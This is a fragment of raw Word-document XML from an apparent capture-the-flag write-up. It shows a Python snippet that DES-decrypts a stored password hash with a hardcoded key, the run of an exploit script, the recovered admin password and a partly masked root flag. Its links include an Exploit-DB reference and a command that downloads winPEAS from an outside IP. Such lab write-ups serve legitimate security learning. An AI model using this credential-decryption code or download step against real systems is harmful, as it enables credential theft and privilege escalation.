        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = base64.b64decode(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DesKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(b"7ly6UznJ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"Decrypted Password : " + key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>except</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"Wrong Hash")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC"/>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9C5F52" wp14:editId="2B6B56B4">
            <wp:extent cx="5731510" cy="14922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FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC"/>
    <w:p w:rsidR="00E95D39" w:rsidRDefault="00E95D39" w:rsidP="00E95D39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3F3A76" w:rsidRDefault="00E95D39" w:rsidP="00E95D39">
      <w:r>
        <w:t>└─# python3 exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008978C5" w:rsidRDefault="00636F3E" w:rsidP="00016145">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="301288D5" wp14:editId="110439AE">
            <wp:extent cx="3886200" cy="7715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3E" w:rsidRDefault="00636F3E" w:rsidP="00016145"/>
    <w:p w:rsidR="00243E4A" w:rsidRDefault="005F61C9" w:rsidP="00016145">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
      <w:r w:rsidRPr="005F61C9">
        <w:t>kidvscat_admin_@123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F61C9" w:rsidRDefault="004B4549" w:rsidP="00016145">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1379C1B5" wp14:editId="60D5FCAD">
            <wp:extent cx="5731510" cy="163639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4549" w:rsidRDefault="004B4549" w:rsidP="00016145"/>
    <w:p w:rsidR="004B4549" w:rsidRDefault="004B4549" w:rsidP="00016145">
      <w:r>
        <w:t xml:space="preserve">Root.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4549">
        <w:t>2faea0642caa21</w:t>
      </w:r>
      <w:r w:rsidR="009D0525">
        <w:t>XXXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95D39" w:rsidRDefault="00E95D39" w:rsidP="00016145"/>
    <w:p w:rsidR="008978C5" w:rsidRDefault="008978C5" w:rsidP="00016145"/>
    <w:p w:rsidR="006C6BED" w:rsidRDefault="006C6BED" w:rsidP="00016145"/>
    <w:p w:rsidR="00F83D47" w:rsidRDefault="00F83D47" w:rsidP="00016145"/>
    <w:p w:rsidR="005F25C6" w:rsidRDefault="005F25C6" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="005F25C6" w:rsidRDefault="005F25C6" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00BA0481" w:rsidRDefault="00BA0481" w:rsidP="006E1567"/>
    <w:sectPr w:rsidR="00BA0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D22"/>
    <w:rsid w:val="00012986"/>
    <w:rsid w:val="00016145"/>
    <w:rsid w:val="00047B93"/>
    <w:rsid w:val="00050229"/>
    <w:rsid w:val="000D10B9"/>
    <w:rsid w:val="00154D22"/>
    <w:rsid w:val="00190A25"/>
    <w:rsid w:val="001A08FC"/>
    <w:rsid w:val="002065C7"/>
    <w:rsid w:val="00212F62"/>
    <w:rsid w:val="00243E4A"/>
    <w:rsid w:val="00251793"/>
    <w:rsid w:val="003726E5"/>
    <w:rsid w:val="003E5083"/>
    <w:rsid w:val="003F3A76"/>
    <w:rsid w:val="00412CCF"/>
    <w:rsid w:val="004B4549"/>
    <w:rsid w:val="004C42CA"/>
    <w:rsid w:val="004C60D9"/>
    <w:rsid w:val="00540B22"/>
    <w:rsid w:val="0056465E"/>
    <w:rsid w:val="005A2651"/>
    <w:rsid w:val="005B61D2"/>
    <w:rsid w:val="005D068E"/>
    <w:rsid w:val="005E3898"/>
    <w:rsid w:val="005F25C6"/>
    <w:rsid w:val="005F61C9"/>
    <w:rsid w:val="00601C7C"/>
    <w:rsid w:val="00636F3E"/>
    <w:rsid w:val="006B091C"/>
    <w:rsid w:val="006C6BED"/>
    <w:rsid w:val="006E1567"/>
    <w:rsid w:val="007104EC"/>
    <w:rsid w:val="007426FF"/>
    <w:rsid w:val="00750A2B"/>
    <w:rsid w:val="00764E54"/>
    <w:rsid w:val="0079292A"/>
    <w:rsid w:val="007C5AA5"/>
    <w:rsid w:val="00861246"/>
    <w:rsid w:val="0086466B"/>
    <w:rsid w:val="00873C08"/>
    <w:rsid w:val="00877BC5"/>
    <w:rsid w:val="008877AE"/>
    <w:rsid w:val="008978C5"/>
    <w:rsid w:val="008B67A6"/>
    <w:rsid w:val="008C615E"/>
    <w:rsid w:val="00937A9B"/>
    <w:rsid w:val="00944BDC"/>
    <w:rsid w:val="00954F50"/>
    <w:rsid w:val="00965CBD"/>
    <w:rsid w:val="009856D1"/>
    <w:rsid w:val="009957FF"/>
    <w:rsid w:val="009A11DC"/>
    <w:rsid w:val="009A6CA6"/>
    <w:rsid w:val="009B0162"/>
    <w:rsid w:val="009B2662"/>
    <w:rsid w:val="009C2429"/>
    <w:rsid w:val="009C52BC"/>
    <w:rsid w:val="009C6C2F"/>
    <w:rsid w:val="009C7E80"/>
    <w:rsid w:val="009D0525"/>
    <w:rsid w:val="00A13959"/>
    <w:rsid w:val="00A84ABF"/>
    <w:rsid w:val="00A85A7B"/>
    <w:rsid w:val="00A872BB"/>
    <w:rsid w:val="00AE0469"/>
    <w:rsid w:val="00B06737"/>
    <w:rsid w:val="00B16772"/>
    <w:rsid w:val="00B5379A"/>
    <w:rsid w:val="00B64886"/>
    <w:rsid w:val="00BA0481"/>
    <w:rsid w:val="00BB79E8"/>
    <w:rsid w:val="00C10190"/>
    <w:rsid w:val="00C5019B"/>
    <w:rsid w:val="00C7297C"/>
    <w:rsid w:val="00CD2BAF"/>
    <w:rsid w:val="00D0377E"/>
    <w:rsid w:val="00D07FBE"/>
    <w:rsid w:val="00D13B2A"/>
    <w:rsid w:val="00D56C33"/>
    <w:rsid w:val="00D92A17"/>
    <w:rsid w:val="00D953DF"/>
    <w:rsid w:val="00DF2306"/>
    <w:rsid w:val="00E06BED"/>
    <w:rsid w:val="00E26405"/>
    <w:rsid w:val="00E312EB"/>
    <w:rsid w:val="00E4314A"/>
    <w:rsid w:val="00E95D39"/>
    <w:rsid w:val="00EA3D53"/>
    <w:rsid w:val="00EC7F50"/>
    <w:rsid w:val="00F02F13"/>
    <w:rsid w:val="00F60D9B"/>
    <w:rsid w:val="00F83D47"/>
    <w:rsid w:val="00F93F78"/>
    <w:rsid w:val="00FE27B9"/>
    <w:rsid w:val="00FE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1CE3C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{109BA2AA-A0DC-4EF1-9D0A-38D9BEF8E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01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://10.10.15.37/winPEASx64.exe%20-OutFile%20winPEASx64.exe" TargetMode="External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hyperlink" Target="https://www.exploit-db.com/exploits/49409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www.exploit-db.com/exploits/49409" TargetMode="External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165</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-09T01:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-11T07:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>